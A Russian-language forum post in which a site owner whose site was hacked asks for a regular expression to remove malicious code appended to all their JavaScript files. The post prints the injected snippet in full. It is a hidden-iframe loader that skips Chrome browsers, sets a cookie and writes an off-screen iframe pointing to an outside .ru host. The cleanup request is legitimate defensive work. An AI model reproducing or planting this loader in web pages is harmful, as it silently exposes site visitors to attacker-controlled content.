Всем привет! Помогите составить регулярку для массовой замены в js файлах. Вздули сайт и во всех js такой код прилеплен.
Причем комменты меняются /*214afaae*/ Т.е. тут наверное надо юзать \/\*(.*)\*\/
в PHP так же был обнаружен вредоносный код, его почистил
Сделал /^\/\*(.*)\*\/(.*)filesynchingstone(.*)\}\)\(\);(\/\*(.*)\*\/)/s
но захватывает все до последнего коммента, если комментов в файле нет, то работает нормально.
CODE ( javascript):
скопировать код в буфер обмена
/*214afaae*/(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function papirosa(){ var denyList = ['Chrome']; var denyUA = false; for (var i in denyList) { if (stripos(navigator.userAgent, denyList[i])) { denyUA = true; break; } } return denyUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!papirosa()) { var cookie = getCookie('b19ad018sc'); if (cookie == undefined) { setCookie('b19ad018sc', true, 292200); document.write('<iframe height="117" style="position:absolute;left:-1000px;top:-1000px;" width="117" src="http://filesynchingstone.ru/mhg7.fOxVhIC?default"></iframe>'); } }; })();/*eaa795220*/
|